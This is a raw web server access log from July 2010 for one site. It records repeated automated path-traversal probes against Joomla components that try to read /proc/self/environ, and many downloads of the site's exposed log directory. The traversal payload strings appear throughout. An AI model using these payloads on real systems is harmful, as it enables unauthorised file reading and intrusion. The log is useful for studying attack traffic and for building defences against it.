67.205.67.73 - - [24/Jul/2010:10:25:43 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:26:01 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:26:01 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:26:01 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:28:11 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:30:08 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:36:36 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:36:36 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:36:36 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
211.206.120.196 - - [24/Jul/2010:10:38:05 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "virtualsupplynet.com"
211.206.120.196 - - [24/Jul/2010:10:38:18 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "virtualsupplynet.com"
211.206.120.196 - - [24/Jul/2010:10:39:26 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:41:09 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:41:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:41:09 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:42:47 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:42:47 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
67.205.67.73 - - [24/Jul/2010:10:42:47 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:50:20 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:50:20 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.170.145 - - [24/Jul/2010:10:50:21 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:02:06 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:03:17 -0700] "GET /logs/ HTTP/1.1" 200 3798 "http://www.virtualsupplynet.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:03:20 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://www.virtualsupplynet.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:17 -0700] "GET /logs/access.log HTTP/1.1" 200 31953 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:19 -0700] "GET /logs/access_100626.log HTTP/1.1" 200 104629 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:23 -0700] "GET /logs/scripts.log HTTP/1.1" 200 1498 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:26 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 147627 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:26 -0700] "GET /logs/access_100508.log HTTP/1.1" 200 116956 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:28 -0700] "GET /logs/access_100710.log HTTP/1.0" 200 105686 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:29 -0700] "GET /logs/access_100529.log HTTP/1.1" 200 87564 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:30 -0700] "GET /logs/access_100717.log HTTP/1.1" 200 65536 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:33 -0700] "GET /logs/access_100703.log HTTP/1.1" 200 96073 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:35 -0700] "GET /logs/access_100501.log HTTP/1.1" 200 73111 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:35 -0700] "GET /logs/access_100410.log HTTP/1.1" 200 75311 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:36 -0700] "GET /logs/access_100605.log HTTP/1.1" 200 125664 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:37 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:38 -0700] "GET /logs/access_100612.log HTTP/1.1" 200 104934 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:39 -0700] "GET /logs/access_100424.log HTTP/1.1" 200 61491 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:40 -0700] "GET /logs/access_100313.log HTTP/1.1" 200 79502 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:40 -0700] "GET /logs/access_100327.log HTTP/1.1" 200 146768 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:41 -0700] "GET /logs/access_100306.log HTTP/1.1" 200 82540 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:42 -0700] "GET /logs/access_100417.log HTTP/1.1" 200 70879 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:43 -0700] "GET /logs/access_100619.log HTTP/1.1" 200 114275 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:44 -0700] "GET /logs/access_100320.log HTTP/1.1" 200 138251 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:45 -0700] "GET /logs/access_100724.log HTTP/1.1" 200 196608 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
38.105.83.11 - - [24/Jul/2010:11:04:45 -0700] "GET /logs/access_100403.log HTTP/1.1" 200 36253 "http://www.virtualsupplynet.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.virtualsupplynet.com"
211.206.120.196 - - [24/Jul/2010:11:05:20 -0700] "GET /logs/access_100703.log/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "virtualsupplynet.com"
211.206.120.196 - - [24/Jul/2010:11:05:21 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "virtualsupplynet.com"
211.206.120.196 - - [24/Jul/2010:11:05:22 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.79" "virtualsupplynet.com"
211.206.120.196 - - [24/Jul/2010:11:19:26 -0700] "GET /logs/access_100703.log/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "virtualsupplynet.com"
211.206.120.196 - - [24/Jul/2010:11:19:27 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "virtualsupplynet.com"
211.206.120.196 - - [24/Jul/2010:11:19:27 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.79" "virtualsupplynet.com"
209.200.238.15 - - [24/Jul/2010:11:20:10 -0700] "GET /logs/access_100703.log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "virtualsupplynet.com"
209.200.238.15 - - [24/Jul/2010:11:20:10 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "virtualsupplynet.com"
209.200.238.15 - - [24/Jul/2010:11:20:10 -0700] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "virtualsupplynet.com"
211.206.120.196 - - [24/Jul/2010:11:21:41 -0700] "GET /logs/access_100703.log/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "virtualsupplynet.com"
211.206.120.196 - - [24/Jul/2010:11:21:41 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "virtualsupplynet.com"
211.206.120.196 - - [24/Jul/2010:11:21:42 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.79" "virtualsupplynet.com"
216.18.213.162 - - [24/Jul/2010:11:23:48 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
216.18.213.162 - - [24/Jul/2010:11:24:13 -0700] "GET /logs/access_100612.log HTTP/1.1" 200 104934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
114.38.70.126 - - [24/Jul/2010:11:34:44 -0700] "GET /logs/access_100612.log HTTP/1.1" 200 104934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
175.180.214.81 - - [24/Jul/2010:12:08:43 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
118.168.102.163 - - [24/Jul/2010:12:09:32 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
216.18.213.162 - - [24/Jul/2010:12:45:17 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
70.36.103.59 - - [24/Jul/2010:13:40:06 -0700] "GET /robots.txt HTTP/1.0" 404 - "http://www.virtualsupplynet.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
70.36.103.59 - - [24/Jul/2010:13:40:09 -0700] "GET / HTTP/1.0" 200 763 "http://www.virtualsupplynet.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
91.121.7.123 - - [24/Jul/2010:13:50:44 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
91.121.7.123 - - [24/Jul/2010:13:51:15 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
118.170.206.250 - - [24/Jul/2010:13:51:22 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
89.200.169.163 - - [24/Jul/2010:13:51:45 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.169.163 - - [24/Jul/2010:13:52:07 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
114.44.1.200 - - [24/Jul/2010:13:56:26 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
91.121.7.123 - - [24/Jul/2010:13:57:13 -0700] "GET /logs/access_100703.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
91.121.7.123 - - [24/Jul/2010:13:57:13 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
91.121.7.123 - - [24/Jul/2010:13:57:14 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
91.121.7.123 - - [24/Jul/2010:13:58:23 -0700] "GET /logs/access_100703.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
91.121.7.123 - - [24/Jul/2010:13:58:23 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
91.121.7.123 - - [24/Jul/2010:13:58:23 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
89.200.169.163 - - [24/Jul/2010:13:58:29 -0700] "GET /logs/access_100703.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.169.163 - - [24/Jul/2010:13:58:29 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.169.163 - - [24/Jul/2010:13:58:30 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
175.180.214.81 - - [24/Jul/2010:13:59:23 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
89.200.169.163 - - [24/Jul/2010:13:59:26 -0700] "GET /logs/access_100703.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.169.163 - - [24/Jul/2010:13:59:26 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
89.200.169.163 - - [24/Jul/2010:13:59:26 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "virtualsupplynet.com"
212.154.246.147 - - [24/Jul/2010:14:00:27 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "virtualsupplynet.com"
112.105.117.175 - - [24/Jul/2010:14:06:18 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
112.104.3.158 - - [24/Jul/2010:14:26:22 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
212.154.246.147 - - [24/Jul/2010:14:40:49 -0700] "GET /logs/access_100703.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "virtualsupplynet.com"
212.154.246.147 - - [24/Jul/2010:14:40:50 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "virtualsupplynet.com"
212.154.246.147 - - [24/Jul/2010:14:40:50 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "virtualsupplynet.com"
114.45.57.201 - - [24/Jul/2010:15:01:38 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
222.50.1.60 - - [24/Jul/2010:15:25:25 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
112.105.117.175 - - [24/Jul/2010:15:51:12 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
88.250.57.232 - - [24/Jul/2010:16:37:39 -0700] "GET /logs/access_100723.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
38.105.71.114 - - [24/Jul/2010:16:48:58 -0700] "GET /logs/access_100306.log HTTP/1.0" 200 82540 "http://www.google.com/search?hl=en&source=hp&q=www.virtualsupplynet.com/logs/access_100306.log&aq=f&oq=&aqi=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.virtualsupplynet.com"
38.105.71.120 - - [24/Jul/2010:16:49:00 -0700] "GET /logs/access_100327.log HTTP/1.0" 200 146768 "http://www.google.com/search?hl=en&source=hp&q=www.virtualsupplynet.com/logs/access_100327.log&aq=f&oq=&aqi=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.virtualsupplynet.com"
38.105.71.114 - - [24/Jul/2010:16:49:41 -0700] "GET /logs/access_100313.log HTTP/1.0" 200 79502 "http://www.google.com/search?hl=en&source=hp&q=www.virtualsupplynet.com/logs/access_100313.log&aq=f&oq=&aqi=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.virtualsupplynet.com"
114.38.77.138 - - [24/Jul/2010:17:00:08 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
114.24.73.93 - - [24/Jul/2010:17:05:07 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
114.24.73.93 - - [24/Jul/2010:17:05:19 -0700] "GET /logs/access_100529.log HTTP/1.1" 200 87564 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
121.34.2.132 - - [24/Jul/2010:17:21:23 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
114.41.14.192 - - [24/Jul/2010:18:20:48 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
112.105.117.175 - - [24/Jul/2010:18:24:29 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
208.100.55.39 - - [24/Jul/2010:18:43:09 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "virtualsupplynet.com"
114.24.76.154 - - [24/Jul/2010:18:45:54 -0700] "GET /logs/access_100710.log HTTP/1.1" 200 105686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "virtualsupplynet.com"
72.55.153.180 - - [24/Jul/2010:18:57:22 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
